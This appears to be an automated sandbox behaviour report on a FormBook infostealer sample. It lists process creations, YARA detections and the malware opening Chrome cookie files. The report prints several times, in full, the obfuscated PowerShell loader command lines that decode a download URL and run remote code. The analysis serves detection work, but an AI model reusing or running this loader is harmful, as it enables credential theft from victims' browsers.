          Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "<#debrief klargoeringstekniker overmortgaged kernefrugterne chewers underrealises #>;$nethes='regreskravenes';<#hertugdoemmer accessionernes vitaminisering senvy #>;$hawse=$host.privatedata;if ($hawse) {$justerkammer++;}function bisulc($supernumerary){$frstestyrmand=$supernumerary.length-$justerkammer;for( $entremess=3;$entremess -lt $frstestyrmand;$entremess+=4){$bar+=$supernumerary[$entremess];}$bar;}function brdnidens($naturaliseredes){ .($spectrographic) ($naturaliseredes);}$brnehospitalerne=bisulc 'locmdraobrnz tji m,l fal la t /ga,5tan. f0bog vea(pilwdi iselnv ndd mo,alwslassta stnsant to gro1ov 0,et.fac0ov ;.to nonwcuri atnund6n,c4 ch; ci arbxud,6for4kn,;she harnonv fa:non1n,n2fla1mar.naz0h m),ul mag cae axc nok h.oops/ ac2 lo0teg1 uk0n n0slh1vir0 bo1hum stuf koiu tr kepelf .uo caxew./ e1bar2bol1lan.pol0s,n ';$paplike=bisulc 'endu epsh,ues.brshr-depana g k ealgnn at al ';$overconfidences=bisulc 'equhbultelstkiupsyssfra: .o/j.h/ sodk.nrbrni mav oeisl.selgdemo a.ori,gkillsabeunc. caclsbo mumthe/hu.u omce g?arbeheixbilpdecohemrundtbla= chdsniofulwindn upltagocema,oiddid&baiib uddom= .e1cyc-harmin 5ferlfu z unl,ollsp,vth hlaag brmsam9end2 re1korztigw selze unav8 ari arq.if3te w.atk proho u dicmi 8innuwhi8conqcornsal ';$corbovinum=bisulc ' sp>tai ';$spectrographic=bisulc 'suci noe vexpel ';$accretive='aphanozygous';$tilvrelsens = bisulc '.useb nc fohe nosc gli%rimaufop p.p.irdpelay.ut rea il% ul\ ,oiha.lbaadh rp a r onvhisepal. ppfthuoforkun. tr&tvr& p cue rucindh.ncota. fartink ';brdnidens (bisulc 'uin$vocg lvlmedooscb raax ls,i:alir rivudle empaffefl,lcirsskoe ponmare re=gru( rc p.msupd u. ind/undcund he $bilt briprolbenvkalrdryel,nltetsupae klnmetsisd)din ');brdnidens (bisulc 'int$geogdoklde oskrbpr as ml dr:,nhl inghetetr ddesoskimconms de c npatsb.r= co$fryoaervdreevanrconckelononnanaftr,itvidcatetownguacruseungsi.d.stas.urp bol peic stphy(war$st.cconotelrsambbr oskuvtakicurn hounonmper)sce ');brdnidens (bisulc 'ple[parn.ide,iltdek. ens sue anr tevcriidolc baeforpfiro uaisemn trt .mm mia onnforasubg flehalr in]ir : u :blisresephoc stucirrbesigrntwhuyincp.inr ego pataf.otrvcun,oenelent .at= tu g [pelncr,eslatarm. posba eg ocma uarbrdo iscutbefysprpvelr c ostytdisos rcslaostil aat atyemipaxse wa] re:dry:i.mtal.lsessne 1pas2 .l ');$overconfidences=$lgedommens[0];$continuums= (bisulc ' wi$cepg dul arobagbnona all,em: camc lakn c h,rblioelirbruhse iuafnhjsueugs o2wi,1fo,8o s=moun ave hywm d- dfo kabprej.hoebancmextim enrsdu ygevssipt u e ,umoce.folnmace p t un.bajwkylee sbc lcd.dlomdiurbe exnda t');$continuums+=$rvepelsene[1];brdnidens ($continuums);brdnidens (bisulc 'cal$o aman a pcplar beo ntrdivhcroipernsocud ssb,r2 e1 pl8 os.sikhve,e trapupdko ebearctesrat[ ec$inspra,ahygploblhaeilolk gueo e]tru=uaf$ut b s.rskrnsele h hko overs grpforimant fravillo.semi rh.inplaemis ');$kardinalen=bisulc 'c,r$grumclaamodc
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" /c ^"c:\windows\syswow64\windowspowershell\v1.0\powershell.exe^" "<#debrief klargoeringstekniker overmortgaged kernefrugterne chewers underrealises #>;$nethes='regreskravenes';<#hertugdoemmer accessionernes vitaminisering senvy #>;$hawse=$host.privatedata;if ($hawse) {$justerkammer++;}function bisulc($supernumerary){$frstestyrmand=$supernumerary.length-$justerkammer;for( $entremess=3;$entremess -lt $frstestyrmand;$entremess+=4){$bar+=$supernumerary[$entremess];}$bar;}function brdnidens($naturaliseredes){ .($spectrographic) ($naturaliseredes);}$brnehospitalerne=bisulc 'locmdraobrnz tji m,l fal la t /ga,5tan. f0bog vea(pilwdi iselnv ndd mo,alwslassta stnsant to gro1ov 0,et.fac0ov ;.to nonwcuri atnund6n,c4 ch; ci arbxud,6for4kn,;she harnonv fa:non1n,n2fla1mar.naz0h m),ul mag cae axc nok h.oops/ ac2 lo0teg1 uk0n n0slh1vir0 bo1hum stuf koiu tr kepelf .uo caxew./ e1bar2bol1lan.pol0s,n ';$paplike=bisulc 'endu epsh,ues.brshr-depana g k ealgnn at al ';$overconfidences=bisulc 'equhbultelstkiupsyssfra: .o/j.h/ sodk.nrbrni mav oeisl.selgdemo a.ori,gkillsabeunc. caclsbo mumthe/hu.u omce g?arbeheixbilpdecohemrundtbla= chdsniofulwindn upltagocema,oiddid&baiib uddom= .e1cyc-harmin 5ferlfu z unl,ollsp,vth hlaag brmsam9end2 re1korztigw selze unav8 ari arq.if3te w.atk proho u dicmi 8innuwhi8conqcornsal ';$corbovinum=bisulc ' sp>tai ';$spectrographic=bisulc 'suci noe vexpel ';$accretive='aphanozygous';$tilvrelsens = bisulc '.useb nc fohe nosc gli%rimaufop p.p.irdpelay.ut rea il% ul\ ,oiha.lbaadh rp a r onvhisepal. ppfthuoforkun. tr&tvr& p cue rucindh.ncota. fartink ';brdnidens (bisulc 'uin$vocg lvlmedooscb raax ls,i:alir rivudle empaffefl,lcirsskoe ponmare re=gru( rc p.msupd u. ind/undcund he $bilt briprolbenvkalrdryel,nltetsupae klnmetsisd)din ');brdnidens (bisulc 'int$geogdoklde oskrbpr as ml dr:,nhl inghetetr ddesoskimconms de c npatsb.r= co$fryoaervdreevanrconckelononnanaftr,itvidcatetownguacruseungsi.d.stas.urp bol peic stphy(war$st.cconotelrsambbr oskuvtakicurn hounonmper)sce ');brdnidens (bisulc 'ple[parn.ide,iltdek. ens sue anr tevcriidolc baeforpfiro uaisemn trt .mm mia onnforasubg flehalr in]ir : u :blisresephoc stucirrbesigrntwhuyincp.inr ego pataf.otrvcun,oenelent .at= tu g [pelncr,eslatarm. posba eg ocma uarbrdo iscutbefysprpvelr c ostytdisos rcslaostil aat atyemipaxse wa] re:dry:i.mtal.lsessne 1pas2 .l ');$overconfidences=$lgedommens[0];$continuums= (bisulc ' wi$cepg dul arobagbnona all,em: camc lakn c h,rblioelirbruhse iuafnhjsueugs o2wi,1fo,8o s=moun ave hywm d- dfo kabprej.hoebancmextim enrsdu ygevssipt u e ,umoce.folnmace p t un.bajwkylee sbc lcd.dlomdiurbe exnda t');$continuums+=$rvepelsene[1];brdnidens ($continuums);brdnidens (bisulc 'cal$o aman a pcplar beo ntrdivhcroipernsocud ssb,r2 e1 pl8 os.sikhve,e trapupdko ebearctesrat[ ec$inspra,ahygploblhaeilolk gueo e]tru=uaf$ut b s.rskrnsele h hko overs grpforimant fravillo.semi rh.inplaemis ');$kardinalen=bisulc 'c,r$grumcla
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" "<#debrief klargoeringstekniker overmortgaged kernefrugterne chewers underrealises #>;$nethes='regreskravenes';<#hertugdoemmer accessionernes vitaminisering senvy #>;$hawse=$host.privatedata;if ($hawse) {$justerkammer++;}function bisulc($supernumerary){$frstestyrmand=$supernumerary.length-$justerkammer;for( $entremess=3;$entremess -lt $frstestyrmand;$entremess+=4){$bar+=$supernumerary[$entremess];}$bar;}function brdnidens($naturaliseredes){ .($spectrographic) ($naturaliseredes);}$brnehospitalerne=bisulc 'locmdraobrnz tji m,l fal la t /ga,5tan. f0bog vea(pilwdi iselnv ndd mo,alwslassta stnsant to gro1ov 0,et.fac0ov ;.to nonwcuri atnund6n,c4 ch; ci arbxud,6for4kn,;she harnonv fa:non1n,n2fla1mar.naz0h m),ul mag cae axc nok h.oops/ ac2 lo0teg1 uk0n n0slh1vir0 bo1hum stuf koiu tr kepelf .uo caxew./ e1bar2bol1lan.pol0s,n ';$paplike=bisulc 'endu epsh,ues.brshr-depana g k ealgnn at al ';$overconfidences=bisulc 'equhbultelstkiupsyssfra: .o/j.h/ sodk.nrbrni mav oeisl.selgdemo a.ori,gkillsabeunc. caclsbo mumthe/hu.u omce g?arbeheixbilpdecohemrundtbla= chdsniofulwindn upltagocema,oiddid&baiib uddom= .e1cyc-harmin 5ferlfu z unl,ollsp,vth hlaag brmsam9end2 re1korztigw selze unav8 ari arq.if3te w.atk proho u dicmi 8innuwhi8conqcornsal ';$corbovinum=bisulc ' sp>tai ';$spectrographic=bisulc 'suci noe vexpel ';$accretive='aphanozygous';$tilvrelsens = bisulc '.useb nc fohe nosc gli%rimaufop p.p.irdpelay.ut rea il% ul\ ,oiha.lbaadh rp a r onvhisepal. ppfthuoforkun. tr&tvr& p cue rucindh.ncota. fartink ';brdnidens (bisulc 'uin$vocg lvlmedooscb raax ls,i:alir rivudle empaffefl,lcirsskoe ponmare re=gru( rc p.msupd u. ind/undcund he $bilt briprolbenvkalrdryel,nltetsupae klnmetsisd)din ');brdnidens (bisulc 'int$geogdoklde oskrbpr as ml dr:,nhl inghetetr ddesoskimconms de c npatsb.r= co$fryoaervdreevanrconckelononnanaftr,itvidcatetownguacruseungsi.d.stas.urp bol peic stphy(war$st.cconotelrsambbr oskuvtakicurn hounonmper)sce ');brdnidens (bisulc 'ple[parn.ide,iltdek. ens sue anr tevcriidolc baeforpfiro uaisemn trt .mm mia onnforasubg flehalr in]ir : u :blisresephoc stucirrbesigrntwhuyincp.inr ego pataf.otrvcun,oenelent .at= tu g [pelncr,eslatarm. posba eg ocma uarbrdo iscutbefysprpvelr c ostytdisos rcslaostil aat atyemipaxse wa] re:dry:i.mtal.lsessne 1pas2 .l ');$overconfidences=$lgedommens[0];$continuums= (bisulc ' wi$cepg dul arobagbnona all,em: camc lakn c h,rblioelirbruhse iuafnhjsueugs o2wi,1fo,8o s=moun ave hywm d- dfo kabprej.hoebancmextim enrsdu ygevssipt u e ,umoce.folnmace p t un.bajwkylee sbc lcd.dlomdiurbe exnda t');$continuums+=$rvepelsene[1];brdnidens ($continuums);brdnidens (bisulc 'cal$o aman a pcplar beo ntrdivhcroipernsocud ssb,r2 e1 pl8 os.sikhve,e trapupdko ebearctesrat[ ec$inspra,ahygploblhaeilolk gueo e]tru=uaf$ut b s.rskrnsele h hko overs grpforimant fravillo.semi rh.inplaemis ');$kardinalen=bisulc 'c,r$grumclaamod
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "<#debrief klargoeringstekniker overmortgaged kernefrugterne chewers underrealises #>;$nethes='regreskravenes';<#hertugdoemmer accessionernes vitaminisering senvy #>;$hawse=$host.privatedata;if ($hawse) {$justerkammer++;}function bisulc($supernumerary){$frstestyrmand=$supernumerary.length-$justerkammer;for( $entremess=3;$entremess -lt $frstestyrmand;$entremess+=4){$bar+=$supernumerary[$entremess];}$bar;}function brdnidens($naturaliseredes){ .($spectrographic) ($naturaliseredes);}$brnehospitalerne=bisulc 'locmdraobrnz tji m,l fal la t /ga,5tan. f0bog vea(pilwdi iselnv ndd mo,alwslassta stnsant to gro1ov 0,et.fac0ov ;.to nonwcuri atnund6n,c4 ch; ci arbxud,6for4kn,;she harnonv fa:non1n,n2fla1mar.naz0h m),ul mag cae axc nok h.oops/ ac2 lo0teg1 uk0n n0slh1vir0 bo1hum stuf koiu tr kepelf .uo caxew./ e1bar2bol1lan.pol0s,n ';$paplike=bisulc 'endu epsh,ues.brshr-depana g k ealgnn at al ';$overconfidences=bisulc 'equhbultelstkiupsyssfra: .o/j.h/ sodk.nrbrni mav oeisl.selgdemo a.ori,gkillsabeunc. caclsbo mumthe/hu.u omce g?arbeheixbilpdecohemrundtbla= chdsniofulwindn upltagocema,oiddid&baiib uddom= .e1cyc-harmin 5ferlfu z unl,ollsp,vth hlaag brmsam9end2 re1korztigw selze unav8 ari arq.if3te w.atk proho u dicmi 8innuwhi8conqcornsal ';$corbovinum=bisulc ' sp>tai ';$spectrographic=bisulc 'suci noe vexpel ';$accretive='aphanozygous';$tilvrelsens = bisulc '.useb nc fohe nosc gli%rimaufop p.p.irdpelay.ut rea il% ul\ ,oiha.lbaadh rp a r onvhisepal. ppfthuoforkun. tr&tvr& p cue rucindh.ncota. fartink ';brdnidens (bisulc 'uin$vocg lvlmedooscb raax ls,i:alir rivudle empaffefl,lcirsskoe ponmare re=gru( rc p.msupd u. ind/undcund he $bilt briprolbenvkalrdryel,nltetsupae klnmetsisd)din ');brdnidens (bisulc 'int$geogdoklde oskrbpr as ml dr:,nhl inghetetr ddesoskimconms de c npatsb.r= co$fryoaervdreevanrconckelononnanaftr,itvidcatetownguacruseungsi.d.stas.urp bol peic stphy(war$st.cconotelrsambbr oskuvtakicurn hounonmper)sce ');brdnidens (bisulc 'ple[parn.ide,iltdek. ens sue anr tevcriidolc baeforpfiro uaisemn trt .mm mia onnforasubg flehalr in]ir : u :blisresephoc stucirrbesigrntwhuyincp.inr ego pataf.otrvcun,oenelent .at= tu g [pelncr,eslatarm. posba eg ocma uarbrdo iscutbefysprpvelr c ostytdisos rcslaostil aat atyemipaxse wa] re:dry:i.mtal.lsessne 1pas2 .l ');$overconfidences=$lgedommens[0];$continuums= (bisulc ' wi$cepg dul arobagbnona all,em: camc lakn c h,rblioelirbruhse iuafnhjsueugs o2wi,1fo,8o s=moun ave hywm d- dfo kabprej.hoebancmextim enrsdu ygevssipt u e ,umoce.folnmace p t un.bajwkylee sbc lcd.dlomdiurbe exnda t');$continuums+=$rvepelsene[1];brdnidens ($continuums);brdnidens (bisulc 'cal$o aman a pcplar beo ntrdivhcroipernsocud ssb,r2 e1 pl8 os.sikhve,e trapupdko ebearctesrat[ ec$inspra,ahygploblhaeilolk gueo e]tru=uaf$ut b s.rskrnsele h hko overs grpforimant fravillo.semi rh.inplaemis ');$kardinalen=bisulc 'c,r$grumclaamodcJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" /c ^"c:\windows\syswow64\windowspowershell\v1.0\powershell.exe^" "<#debrief klargoeringstekniker overmortgaged kernefrugterne chewers underrealises #>;$nethes='regreskravenes';<#hertugdoemmer accessionernes vitaminisering senvy #>;$hawse=$host.privatedata;if ($hawse) {$justerkammer++;}function bisulc($supernumerary){$frstestyrmand=$supernumerary.length-$justerkammer;for( $entremess=3;$entremess -lt $frstestyrmand;$entremess+=4){$bar+=$supernumerary[$entremess];}$bar;}function brdnidens($naturaliseredes){ .($spectrographic) ($naturaliseredes);}$brnehospitalerne=bisulc 'locmdraobrnz tji m,l fal la t /ga,5tan. f0bog vea(pilwdi iselnv ndd mo,alwslassta stnsant to gro1ov 0,et.fac0ov ;.to nonwcuri atnund6n,c4 ch; ci arbxud,6for4kn,;she harnonv fa:non1n,n2fla1mar.naz0h m),ul mag cae axc nok h.oops/ ac2 lo0teg1 uk0n n0slh1vir0 bo1hum stuf koiu tr kepelf .uo caxew./ e1bar2bol1lan.pol0s,n ';$paplike=bisulc 'endu epsh,ues.brshr-depana g k ealgnn at al ';$overconfidences=bisulc 'equhbultelstkiupsyssfra: .o/j.h/ sodk.nrbrni mav oeisl.selgdemo a.ori,gkillsabeunc. caclsbo mumthe/hu.u omce g?arbeheixbilpdecohemrundtbla= chdsniofulwindn upltagocema,oiddid&baiib uddom= .e1cyc-harmin 5ferlfu z unl,ollsp,vth hlaag brmsam9end2 re1korztigw selze unav8 ari arq.if3te w.atk proho u dicmi 8innuwhi8conqcornsal ';$corbovinum=bisulc ' sp>tai ';$spectrographic=bisulc 'suci noe vexpel ';$accretive='aphanozygous';$tilvrelsens = bisulc '.useb nc fohe nosc gli%rimaufop p.p.irdpelay.ut rea il% ul\ ,oiha.lbaadh rp a r onvhisepal. ppfthuoforkun. tr&tvr& p cue rucindh.ncota. fartink ';brdnidens (bisulc 'uin$vocg lvlmedooscb raax ls,i:alir rivudle empaffefl,lcirsskoe ponmare re=gru( rc p.msupd u. ind/undcund he $bilt briprolbenvkalrdryel,nltetsupae klnmetsisd)din ');brdnidens (bisulc 'int$geogdoklde oskrbpr as ml dr:,nhl inghetetr ddesoskimconms de c npatsb.r= co$fryoaervdreevanrconckelononnanaftr,itvidcatetownguacruseungsi.d.stas.urp bol peic stphy(war$st.cconotelrsambbr oskuvtakicurn hounonmper)sce ');brdnidens (bisulc 'ple[parn.ide,iltdek. ens sue anr tevcriidolc baeforpfiro uaisemn trt .mm mia onnforasubg flehalr in]ir : u :blisresephoc stucirrbesigrntwhuyincp.inr ego pataf.otrvcun,oenelent .at= tu g [pelncr,eslatarm. posba eg ocma uarbrdo iscutbefysprpvelr c ostytdisos rcslaostil aat atyemipaxse wa] re:dry:i.mtal.lsessne 1pas2 .l ');$overconfidences=$lgedommens[0];$continuums= (bisulc ' wi$cepg dul arobagbnona all,em: camc lakn c h,rblioelirbruhse iuafnhjsueugs o2wi,1fo,8o s=moun ave hywm d- dfo kabprej.hoebancmextim enrsdu ygevssipt u e ,umoce.folnmace p t un.bajwkylee sbc lcd.dlomdiurbe exnda t');$continuums+=$rvepelsene[1];brdnidens ($continuums);brdnidens (bisulc 'cal$o aman a pcplar beo ntrdivhcroipernsocud ssb,r2 e1 pl8 os.sikhve,e trapupdko ebearctesrat[ ec$inspra,ahygploblhaeilolk gueo e]tru=uaf$ut b s.rskrnsele h hko overs grpforimant fravillo.semi rh.inplaemis ');$kardinalen=bisulc 'c,r$grumclaJump to behavior
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" "<#debrief klargoeringstekniker overmortgaged kernefrugterne chewers underrealises #>;$nethes='regreskravenes';<#hertugdoemmer accessionernes vitaminisering senvy #>;$hawse=$host.privatedata;if ($hawse) {$justerkammer++;}function bisulc($supernumerary){$frstestyrmand=$supernumerary.length-$justerkammer;for( $entremess=3;$entremess -lt $frstestyrmand;$entremess+=4){$bar+=$supernumerary[$entremess];}$bar;}function brdnidens($naturaliseredes){ .($spectrographic) ($naturaliseredes);}$brnehospitalerne=bisulc 'locmdraobrnz tji m,l fal la t /ga,5tan. f0bog vea(pilwdi iselnv ndd mo,alwslassta stnsant to gro1ov 0,et.fac0ov ;.to nonwcuri atnund6n,c4 ch; ci arbxud,6for4kn,;she harnonv fa:non1n,n2fla1mar.naz0h m),ul mag cae axc nok h.oops/ ac2 lo0teg1 uk0n n0slh1vir0 bo1hum stuf koiu tr kepelf .uo caxew./ e1bar2bol1lan.pol0s,n ';$paplike=bisulc 'endu epsh,ues.brshr-depana g k ealgnn at al ';$overconfidences=bisulc 'equhbultelstkiupsyssfra: .o/j.h/ sodk.nrbrni mav oeisl.selgdemo a.ori,gkillsabeunc. caclsbo mumthe/hu.u omce g?arbeheixbilpdecohemrundtbla= chdsniofulwindn upltagocema,oiddid&baiib uddom= .e1cyc-harmin 5ferlfu z unl,ollsp,vth hlaag brmsam9end2 re1korztigw selze unav8 ari arq.if3te w.atk proho u dicmi 8innuwhi8conqcornsal ';$corbovinum=bisulc ' sp>tai ';$spectrographic=bisulc 'suci noe vexpel ';$accretive='aphanozygous';$tilvrelsens = bisulc '.useb nc fohe nosc gli%rimaufop p.p.irdpelay.ut rea il% ul\ ,oiha.lbaadh rp a r onvhisepal. ppfthuoforkun. tr&tvr& p cue rucindh.ncota. fartink ';brdnidens (bisulc 'uin$vocg lvlmedooscb raax ls,i:alir rivudle empaffefl,lcirsskoe ponmare re=gru( rc p.msupd u. ind/undcund he $bilt briprolbenvkalrdryel,nltetsupae klnmetsisd)din ');brdnidens (bisulc 'int$geogdoklde oskrbpr as ml dr:,nhl inghetetr ddesoskimconms de c npatsb.r= co$fryoaervdreevanrconckelononnanaftr,itvidcatetownguacruseungsi.d.stas.urp bol peic stphy(war$st.cconotelrsambbr oskuvtakicurn hounonmper)sce ');brdnidens (bisulc 'ple[parn.ide,iltdek. ens sue anr tevcriidolc baeforpfiro uaisemn trt .mm mia onnforasubg flehalr in]ir : u :blisresephoc stucirrbesigrntwhuyincp.inr ego pataf.otrvcun,oenelent .at= tu g [pelncr,eslatarm. posba eg ocma uarbrdo iscutbefysprpvelr c ostytdisos rcslaostil aat atyemipaxse wa] re:dry:i.mtal.lsessne 1pas2 .l ');$overconfidences=$lgedommens[0];$continuums= (bisulc ' wi$cepg dul arobagbnona all,em: camc lakn c h,rblioelirbruhse iuafnhjsueugs o2wi,1fo,8o s=moun ave hywm d- dfo kabprej.hoebancmextim enrsdu ygevssipt u e ,umoce.folnmace p t un.bajwkylee sbc lcd.dlomdiurbe exnda t');$continuums+=$rvepelsene[1];brdnidens ($continuums);brdnidens (bisulc 'cal$o aman a pcplar beo ntrdivhcroipernsocud ssb,r2 e1 pl8 os.sikhve,e trapupdko ebearctesrat[ ec$inspra,ahygploblhaeilolk gueo e]tru=uaf$ut b s.rskrnsele h hko overs grpforimant fravillo.semi rh.inplaemis ');$kardinalen=bisulc 'c,r$grumclaamodJump to behavior
          Source: osqpHpjBCXXA.exe, 0000000B.00000002.2981129582.0000000001810000.00000002.00000001.00040000.00000000.sdmp, osqpHpjBCXXA.exe, 0000000B.00000000.2351716921.0000000001810000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
          Source: osqpHpjBCXXA.exe, 0000000B.00000002.2981129582.0000000001810000.00000002.00000001.00040000.00000000.sdmp, osqpHpjBCXXA.exe, 0000000B.00000000.2351716921.0000000001810000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
          Source: osqpHpjBCXXA.exe, 0000000B.00000002.2981129582.0000000001810000.00000002.00000001.00040000.00000000.sdmp, osqpHpjBCXXA.exe, 0000000B.00000000.2351716921.0000000001810000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
          Source: osqpHpjBCXXA.exe, 0000000B.00000002.2981129582.0000000001810000.00000002.00000001.00040000.00000000.sdmp, osqpHpjBCXXA.exe, 0000000B.00000000.2351716921.0000000001810000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: }Program Manager
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

          Stealing of Sensitive Information

          barindex
          Yara detected FormBook
          Source: Yara matchFile source: 0000000C.00000002.2981736437.0000000000940000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000C.00000002.2979890759.0000000000390000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000E.00000002.2981468701.0000000001200000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000C.00000002.2981799081.00000000029A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000002.2981578138.0000000003890000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000002.2447450866.0000000022690000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000002.2446978661.00000000216E0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Tries to harvest and steal browser information (history, passwords, etc)
          Source: C:\Windows\SysWOW64\ktmutil.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
          Source: C:\Windows\SysWOW64\ktmutil.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
